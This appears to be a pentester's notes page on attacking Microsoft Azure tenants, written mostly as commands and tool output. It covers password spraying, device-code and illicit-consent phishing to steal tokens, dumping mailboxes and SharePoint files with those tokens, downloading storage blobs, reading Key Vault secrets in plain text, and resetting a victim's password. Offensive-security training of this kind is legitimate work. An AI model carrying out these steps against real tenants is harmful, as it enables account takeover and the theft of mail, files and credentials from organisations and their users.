Azure
Getting Access
The first part of Azure pentesting is trying to get access.
This can be done via various methods
Brute forcing accounts
Phishing for tokens
Connecting to public resources that may contain credentials
Brute Forcing
We can use MSOL-Spray to spray a password for different accounts
Import-Module .\MSOLSpray-master\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Password123
[*] There are 5 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 04/18/2022 14:22:05Phishing Links
There are two ways to phish for tokens
Token Tactics
Illicit Consent Attacks
Token Tactics
We can use Token Tactics to generate a phishing link to send to the user
Import-Module .\TokenTactics-main\TokenTactics.psd1
> Get-AzureToken -Client MSGraph
user_code : C4UJUN7B3
device_code : CAQABAAEAAAD--DLA3VO7Qr…
verification_url : https://microsoft.com/devicelogin
expires_in : 900
interval : 5
message : To sign in, use a web browser to open the page
https://microsoft.com/devicelogin and enter the code C4UJUN7B3 to
authenticate.
authorization_pendingNow we send the email to the target
When victim clicks and enters the code, we will get his access token
Illicit Consent Attacks
This method of attack assumes you have already breached the portal, and we can further elevate our privileges by creating an application with excessive RW permissions, and trick a user to consenting the application to access data on their behalf.
There are some pre-requisites to this
In the portal, it should say that users can register applications
In User Consent Settings for Enterprise Applications, it should be configured such that users can allow consent for apps
Now we can create an application, and grant it excessive delegated permissions such as reading all data, users and files.
We then need to configure 365-Stealer
Enter the Application ID, Application Secret and Return URL
Now we run the server, and when the user clicks consent to the application, we can get their token with all the delegated permissions we obtained earlier
python .\365-Stealer.py --run-app
A note about tokens
I've written a short blog post here to describe the tokens and their related permissions
Enumeration using Tokens
Once we have access and we have the tokens of the users, we can start enumerating to see what other resources we can access
We can do this via accessing Emails or SharePoint resources
Email dumping
We use Token Tactics again to dump emails using the access token
Import-Module .\TokenTactics-main\TokenTactics-main\TokenTactics.psd1
Dump-OWAMailboxViaMSGraphApi -AccessToken $access_token -mailFolder AllItemsSharePoint dumping
Listing files in SharePoint
$Token =
'eyJ0eXAiOiJKV1QiLCJub25jZSI6InNkZENGd2gzbDlqampfeXhjU0VtLTI1VUlRN0gzc29Ka
2tiZnVMR3BrT1kiLCJhbGciOiJSUzI1NiIsIn[...]RGpfNTJ2YndHTmd2UU8yVnpNYyIsImtp
ZCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyJ9.eyJhdWQiOiJod'
$URI = 'https://graph.microsoft.com/v1.0/me/drive/root/children'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{ 'Authorization' = "Bearer $Token" } }
(Invoke-RestMethod @RequestParams).valueIf we see a resource with download links at @microsoft.graph.downloadUrl, we can visit the URL to download the file
Enumeration using Credentials
If we have user credentials obtained from Brute Forcing, Dumping emails and SharePoint enumeration, we can do deeper enumeration of the Azure Environment
We can either use Azure CLI, or Azure PowerShell cmdlets
The functionalities between these two approaches are similar, with each tool having slightly unique capabilites
Logging In
Logging in with normal user credentials
az login -u "user@domain.com" -p "password"
--allow-no-subscriptions$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('user@domain.com', $password)
Connect-AzAccount -Credential $credsLogging in with SPN accounts
In order to authenticate with SPN, we need the following:
Client ID
Client Secret
Tenant ID
Client ID and Secret should be obtained via other forms of resource enumeration.
We can get Tenant ID by visiting https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
For example
https://login.microsoftonline.com/dummy.onmicrosoft.com/.well-known/openid-configurationNow we can login
az login --service-principal -u <client ID> -p <client Secret> --tenant <Tenant ID>$password = ConvertTo-SecureString <client secret> -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential(<client ID>, $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant <tenant ID>Enumerating Resources
az resource listGet-AzResourceIn the event where you see a container, but the resources are not being shown due to permission issues, we can download them to our local machine instead
# 1. to get the name of the storage
az storage account list
# 2. get the keys for the storage
az storage account keys list --account-name "storagename"
# 3. get the container name
az storage container list --account-name "storagename" --account-key <key_value>
# 4. download all files in the container
az storage blob download-batch -d . -s mycontainer --account-name "storagename" --account-key <key value> Or, we can use Storage Explorer.exe to connect to subscriptions or publicly accessible storage containers
Listing Roles
We need to look out for custom roles, which are user created non-standard roles which contain special privileges
az role assignment list --all
az role definition list --custom-role-onlyGet-AzRoleAssignmentListing Users
Listing all users in the Azure AD
az ad user listGet-AzADuserListing Groups
Getting groups on the AD, as well as group memberships
az ad group listaz ad group member list --group 01086658-6706-44e8-a373-96ab550c72f7Get-AzADGroupGet-AzADGroupMember -ObjectId 01086658-6706-44e8-a373-96ab550c72f7Listing Roles in Azure AD
For this, we need to run Connect-AzureAD with the credentials
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('user@domain.com', $password)
Connect-AzureAD -Credential $credsThen we list available roles
Get-AzureADDirectoryRoleAnd list members who have the role
Get-AzureADDirectoryRole -ObjectId b5da7126-cb27-48e6-a316-e319ba453b65 | Get-AzureADDirectoryRoleMember
If we have a role that can reset passwords, we can do so with these commands
$password = "newpassword" | ConvertTo-SecureString -AsPlainText -Force
(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@domain.com"}).ObjectId | Set-AzureADUserPassword -Password $Password -VerboseAccess Password Vaults
After listing resources, if we see password vaults, we can access the plain text passwords stored in them.
Vaults require special types of tokens to access. These tokens can be obtained with Azure CLI
az account get-access-token --resource https://vault.azure.netOnce we have the token, we use Azure PowerShell cmdlet to access the data
Connect-AzAccount -AccessToken $AccessToken -KeyVaultAccessToken $KeyVault -AccountId e763211c-0447-4a4f-9e9c-da98c94a5f40Get-AzKeyVaultSecret -VaultName Secret-Vault
Get-AzKeyVaultSecret -VaultName Secret-Vault -Name passwords -AsPlainTextRequesting for Tokens
After we have authenticated as a user on Azure CLI, we can request for more token to access other services such as GraphAPI or Azure Password vaults
az account get-access-token --resource https://management.azure.com
az account get-access-token --resource https://vault.azure.net
az account get-access-token --resource https://graph.windows.netLast updated